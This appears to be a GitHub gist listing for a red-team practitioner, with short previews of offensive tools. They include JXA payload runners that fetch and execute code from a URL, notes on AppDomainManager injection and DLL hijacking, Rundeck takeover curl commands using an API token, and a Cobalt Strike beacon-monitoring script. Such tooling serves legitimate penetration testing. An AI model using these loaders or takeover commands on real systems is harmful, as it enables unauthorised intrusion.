Skip to content

Instantly share code, notes, and snippets.

View thesubtlety's full-sized avatar

Noah thesubtlety

43 followers · 51 following
View GitHub Profile
@thesubtlety
thesubtlety / coalmine2.py
Created May 19, 2023 13:43 — forked from HackingLZ/coalmine2.py
coalmine2.py
#!/usr/bin/python3
import re
import zipfile
import argparse
from urllib.parse import urlparse
from colorama import Fore, Style, init
init()
@thesubtlety
thesubtlety / getgo.sh
Created January 5, 2023 20:15
Install go to home dir on debian
#!/bin/bash
# Install golang to home dir
GOPATH="$HOME/go"
GOUTIL="$HOME/.go"
LATEST="$(curl -s https://go.dev/VERSION?m=text)"
DL_PKG="$LATEST.linux-amd64.tar.gz"
DL_URL="https://go.dev/dl/$DL_PKG"
wget "$DL_URL" -P "$GOUTIL"
rm -rf "$GOPATH" && tar -C $HOME -xzf "$GOUTIL/$DL_PKG"
export PATH=$PATH:$HOME/go/bin
@thesubtlety
thesubtlety / template.sh
Created November 18, 2022 23:43
shell script template
#!/usr/bin/env bash
# https://sharats.me/posts/shell-script-best-practices/
set -o errexit
set -o nounset
set -o pipefail
if [[ "${TRACE-0}" == "1" ]]; then
set -o xtrace
fi
@thesubtlety
thesubtlety / jxarun.swift
Last active September 10, 2023 19:25
Run jxa from file http stdin
// adapted from cedowns jxa-runner
import Foundation
import Cocoa
import OSAKit
//Usage:
// for hosted .js JXA payloads: ./JXARunner -u [url_to_jxa_payload]
// for local .js JXA payloads: ./JXARunner -f [path_to_jxa_payload]
// echo 'jxacode' | ./runner -s
@thesubtlety
thesubtlety / jxarunner.m
Created September 30, 2022 18:15
Obj JXA runner
#import <Foundation/Foundation.h>
#import <Appkit/AppKit.h>
#import <CoreFoundation/CoreFoundation.h>
#import <OSAKit/OSAKit.h>
#import <Cocoa/Cocoa.h>
#import <OSAKit/OSALanguage.h>
#import <Foundation/NSString.h>
#include <string.h>
//jxarunner file.js
@thesubtlety
thesubtlety / _notes.md
Created April 25, 2022 14:53 — forked from djhohnstein/_notes.md
AppDomainManager Injection

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

@thesubtlety
thesubtlety / rundeck-commands.md
Created October 14, 2021 15:06
Rundeck Takeover Reference

Rundeck Compromise

Reference notes to run commands on nodes controlled by Rundeck given a valid API token.

RUNDECK="https://host"
TOKEN="x-rundeck-auth-token:<secret>"

# Identify projects
curl -H $TOKEN $RUNDECK/api/16/projects/ -H accept:application/json | jq  .
@thesubtlety
thesubtlety / stalebacon.cna
Created March 26, 2021 21:59
Stale beacon slacker, only messages once
# CNA script to alert on dead beacons. Doesn't repeat messages.
# author: noah @thesubtlety
# credit https://github.com/bluscreenofjeff/AggressorScripts/blob/master/stale-beacon-notifier.cna - bluescreenofjeff
$webhook_url = "https://hooks.slack.com/services/xxxxx";
$slack_channel = "#crackers";
%beacon_status = %();
# default stale value of 5 minutes (300000ms)
$stale_value = 300000;
@thesubtlety
thesubtlety / natlas-docker-howto.md
Last active August 13, 2020 23:15
tl;dr natlas/docker install
@thesubtlety
thesubtlety / Get-Exports.ps1
Created February 12, 2020 17:59
DLL Hijack with exports
function Get-Exports {
<#
.SYNOPSIS
Get-Exports, fetches DLL exports and optionally provides
C++ wrapper output (idential to ExportsToC++ but without
needing VS and a compiled binary). To do this it reads DLL
bytes into memory and then parses them (no LoadLibraryEx).
Because of this you can parse x32/x64 DLL's regardless of
the bitness of PowerShell.